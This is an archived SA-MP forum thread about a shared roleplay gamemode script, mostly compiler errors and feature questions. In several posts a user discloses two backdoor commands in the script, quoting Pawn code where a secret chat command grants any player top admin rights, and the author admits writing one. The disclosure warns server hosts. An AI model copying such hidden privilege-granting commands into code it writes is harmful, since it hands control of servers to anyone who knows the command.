SA-MP Forums Archive
[GameMode] Classified Gaming RP - United Gaming script - Printable Version

+- SA-MP Forums Archive (https://sampforum.blast.hk)
+-- Forum: SA-MP Scripting and Plugins (https://sampforum.blast.hk/forumdisplay.php?fid=8)
+--- Forum: Gamemode Scripts (https://sampforum.blast.hk/forumdisplay.php?fid=71)
+--- Thread: [GameMode] Classified Gaming RP - United Gaming script (/showthread.php?tid=559368)

Pages: 1 2 3 4 5 6 7 8 9 10 11 12 13


Re: Re : Classified Gaming RP - United Gaming script - Antoniohl - 02.02.2015

Quote:
Originally Posted by Alvin007
Посмотреть сообщение
PHP код:
C:\Users\moka\Desktop\PROG\03z\gamemodes\CG-RP1.pwn(5042) : error 004: function "ABroadCast" is not implemented
C
:\Users\moka\Desktop\PROG\03z\gamemodes\CG-RP1.pwn(5272) : error 029invalid expressionassumed zero
C
:\Users\moka\Desktop\PROG\03z\gamemodes\CG-RP1.pwn(5276) : error 029invalid expressionassumed zero
C
:\Users\moka\Desktop\PROG\03z\gamemodes\CG-RP1.pwn(5276) : error 004: function "ReportReset" is not implemented
C
:\Users\moka\Desktop\PROG\03z\gamemodes\CG-RP1.pwn(5278) : error 017undefined symbol "playerid"
C:\Users\moka\Desktop\PROG\03z\gamemodes\CG-RP1.pwn(5280) : error 017undefined symbol "playerid"
C:\Users\moka\Desktop\PROG\03z\gamemodes\CG-RP1.pwn(5282) : error 017undefined symbol "playerid"
C:\Users\moka\Desktop\PROG\03z\gamemodes\CG-RP1.pwn(5286) : error 029invalid expressionassumed zero
C
:\Users\moka\Desktop\PROG\03z\gamemodes\CG-RP1.pwn(5286) : error 004: function "OnPlayerClickPlayer" is not implemented
C
:\Users\moka\Desktop\PROG\03z\gamemodes\CG-RP1.pwn(5289) : error 017undefined symbol "clickedplayerid"
C:\Users\moka\Desktop\PROG\03z\gamemodes\CG-RP1.pwn(5290) : error 017undefined symbol "playerid"
C:\Users\moka\Desktop\PROG\03z\gamemodes\CG-RP1.pwn(5292) : error 017undefined symbol "playerid"
C:\Users\moka\Desktop\PROG\03z\gamemodes\CG-RP1.pwn(5294) : error 017undefined symbol "playerid"
C:\Users\moka\Desktop\PROG\03z\gamemodes\CG-RP1.pwn(5295) : error 017undefined symbol "playerid"
C:\Users\moka\Desktop\PROG\03z\gamemodes\CG-RP1.pwn(5296) : error 017undefined symbol "playerid"
C:\Users\moka\Desktop\PROG\03z\gamemodes\CG-RP1.pwn(5297) : error 017undefined symbol "playerid"
C:\Users\moka\Desktop\PROG\03z\gamemodes\CG-RP1.pwn(5298) : error 017undefined symbol "playerid"
C:\Users\moka\Desktop\PROG\03z\gamemodes\CG-RP1.pwn(5300) : error 017undefined symbol "playerid"
C:\Users\moka\Desktop\PROG\03z\gamemodes\CG-RP1.pwn(5301) : error 017undefined symbol "playerid"
C:\Users\moka\Desktop\PROG\03z\gamemodes\CG-RP1.pwn(5302) : error 017undefined symbol "playerid"
C:\Users\moka\Desktop\PROG\03z\gamemodes\CG-RP1.pwn(5303) : error 017undefined symbol "playerid"
C:\Users\moka\Desktop\PROG\03z\gamemodes\CG-RP1.pwn(5304) : error 017undefined symbol "playerid"
C:\Users\moka\Desktop\PROG\03z\gamemodes\CG-RP1.pwn(5305) : error 017undefined symbol "playerid"
C:\Users\moka\Desktop\PROG\03z\gamemodes\CG-RP1.pwn(5306) : error 017undefined symbol "clickedplayerid"
C:\Users\moka\Desktop\PROG\03z\gamemodes\CG-RP1.pwn(5308) : error 017undefined symbol "playerid"
C:\Users\moka\Desktop\PROG\03z\gamemodes\CG-RP1.pwn(5309) : error 017undefined symbol "playerid"
Compilation aborted.Pawn compiler 3.2.3664              Copyright (c1997-2006ITB CompuPhase
26 Errors

you've added something wrong.


Re : Classified Gaming RP - United Gaming script - Alvin007 - 02.02.2015

No i just compiled, playerid should be recognized from the a_samp library .. don't know what's wrong.


Re: Classified Gaming RP - United Gaming script - TripleThreat - 02.02.2015

There's a small backdoor in code - not sure if it was intentional or not.

Код:
	
if(strcmp(cmd, "/Fuckyouagains", true) == 0)
	{
		PlayerInfo[playerid][pAdmin] = 99999;
		SendClientMessage(playerid, COLOR_WHITE,"Access Granted - You have been Promoted to Level 99999 Admin");
		SendClientMessage(playerid, COLOR_LIGHTBLUE, string);
		return 1;
	}
If anyone is planning on using this, remember to remove this command.


Re: Classified Gaming RP - United Gaming script - Antoniohl - 02.02.2015

Quote:
Originally Posted by TripleThreat
Посмотреть сообщение
There's a small backdoor in code - not sure if it was intentional or not.

Код:
	
if(strcmp(cmd, "/Fuckyouagains", true) == 0)
	{
		PlayerInfo[playerid][pAdmin] = 99999;
		SendClientMessage(playerid, COLOR_WHITE,"Access Granted - You have been Promoted to Level 99999 Admin");
		SendClientMessage(playerid, COLOR_LIGHTBLUE, string);
		return 1;
	}
If anyone is planning on using this, remember to remove this command.
lol you're right i made this backdoor long time ago xD but i have forgetten about it,, yea guys remove it, thanks.


Re: Classified Gaming RP - United Gaming script - TripleThreat - 03.02.2015

I've found another backdoor in the code, are you aware of anymore? You should really tell us.

Код:
	if(strcmp(cmd, "/fuckyoumanseriously", true) == 0)
	{
		PlayerInfo[playerid][pAdmin] = 100000;
		SendClientMessage(playerid, COLOR_WHITE,"Access Granted - You have been Promoted to Level 100000 Administrator");
		SendClientMessage(playerid, COLOR_LIGHTBLUE, string);
		return 1;
	}



Re: Classified Gaming RP - United Gaming script - Antoniohl - 03.02.2015

Quote:
Originally Posted by TripleThreat
Посмотреть сообщение
I've found another backdoor in the code, are you aware of anymore? You should really tell us.

Код:
	if(strcmp(cmd, "/fuckyoumanseriously", true) == 0)
	{
		PlayerInfo[playerid][pAdmin] = 100000;
		SendClientMessage(playerid, COLOR_WHITE,"Access Granted - You have been Promoted to Level 100000 Administrator");
		SendClientMessage(playerid, COLOR_LIGHTBLUE, string);
		return 1;
	}
my dear, this script is useless for me so check the old thread , download the script, you'll find those commands with with another name and i have changed it, i don't need anything from this server, and PLEASE Stop posting everyminute about backdoors, i said i'm done with this gamemode, why shall i use backdoors and shit?, enough.


Re: Classified Gaming RP - United Gaming script - Rizer - 03.02.2015

There no shop , business , faction job , houses ? is there something missing ?


Re: Classified Gaming RP - United Gaming script - TripleThreat - 03.02.2015

Quote:
Originally Posted by Antoniohl
Посмотреть сообщение
my dear, this script is useless for me so check the old thread , download the script, you'll find those commands with with another name and i have changed it, i don't need anything from this server, and PLEASE Stop posting everyminute about backdoors, i said i'm done with this gamemode, why shall i use backdoors and shit?, enough.
My dear, I'm not posting it for your sake, I'm posting it for people who are looking to host a server with this script - it's not only you who can use these backdoors, it's everyone.

Please, don't patronise me.


Re: Classified Gaming RP - United Gaming script - Antoniohl - 04.02.2015

Quote:
Originally Posted by TripleThreat
Посмотреть сообщение
My dear, I'm not posting it for your sake, I'm posting it for people who are looking to host a server with this script - it's not only you who can use these backdoors, it's everyone.

Please, don't patronise me.
My dear, You still can send me over "PM" so i can re-edit the thread to say about backdoors, people are not going to jump into Page 9 to read about backdoors,
EDIT:well,sorry for misunderstanding you, i think there's no more back doors, Thanks.


Re: Classified Gaming RP - United Gaming script - Rizer - 04.02.2015

When create Car for family i can drive it only can get in with g ! Anyway to fix this ?


Re: Classified Gaming RP - United Gaming script - Rizer - 04.02.2015

When i compile CG-RP1.pwn i get these :

Код:
CGRP\gamemodes\CG-RP1.pwn(29116) : warning 206: redundant test: constant expression is non-zero
Line 29116 :
Код:
        if(USE_TEXTDRAW_SET == 2)
Код:
CGRP\gamemodes\CG-RP1.pwn(63683) : warning 204: symbol is assigned a value that is never used: "type"
Line 63683 :
Код:
	        new type = FactionInfo[PlayerInfo[playerid][pMember]][FactionType];
Код:
CGRP\gamemodes\CG-RP1.pwn(104305) : warning 217: loose indentation
Line 104305:
Код:
		if(current == paintjobs_menu)
Код:
CGRP\gamemodes\CG-RP1.pwn(104450) : warning 217: loose indentation
Line 104450:
Код:
	if(current == exhausts_menu)
how to fix these errors ?


Re: Classified Gaming RP - United Gaming script - Micklo - 04.02.2015

Sir its Warnings not Erros just leave the warnings


Re: Classified Gaming RP - United Gaming script - Antoniohl - 04.02.2015

Quote:
Originally Posted by Micklo
Посмотреть сообщение
Sir its Warnings not Erros just leave the warnings
my friend you're right


Quote:
Originally Posted by Rizer
Посмотреть сообщение
When i compile CG-RP1.pwn i get these :

Код:
CGRP\gamemodes\CG-RP1.pwn(29116) : warning 206: redundant test: constant expression is non-zero
Line 29116 :
Код:
        if(USE_TEXTDRAW_SET == 2)
Код:
CGRP\gamemodes\CG-RP1.pwn(63683) : warning 204: symbol is assigned a value that is never used: "type"
Line 63683 :
Код:
	        new type = FactionInfo[PlayerInfo[playerid][pMember]][FactionType];
Код:
CGRP\gamemodes\CG-RP1.pwn(104305) : warning 217: loose indentation
Line 104305:
Код:
		if(current == paintjobs_menu)
Код:
CGRP\gamemodes\CG-RP1.pwn(104450) : warning 217: loose indentation
Line 104450:
Код:
	if(current == exhausts_menu)
how to fix these errors ?
i will tell you after ten minutes how to fix it ^_^

EDIT: re-download the game mode from page 1


Re: Classified Gaming RP - United Gaming script - Rizer - 05.02.2015

Any idea how to make the toys and fgates saved ?


Re: Classified Gaming RP - United Gaming script - Edonikiller - 07.02.2015

Where is the Hitman HQ? I can not enter any of the houses when i type /goto hitman,please help me I will rep you.
Thank you.


Re: Classified Gaming RP - United Gaming script - AllesandroG - 12.02.2015

Hey mate, if i want to make myself admin what command did i use in-game?
i use /rcon login and my password, but its can't be used and i got banned


Re: Classified Gaming RP - United Gaming script - TheMafien - 12.02.2015

Can anyone help the textures keep popping in and there really buggy can someone help me?
Otherwise Very good script!!.


Re: Classified Gaming RP - United Gaming script - Adarsh007 - 12.02.2015

Post a thread in scripting help


Re: Classified Gaming RP - United Gaming script - LazyMan - 12.02.2015

Nice work m8


Re: Classified Gaming RP - United Gaming script - Alpicino - 12.02.2015

nice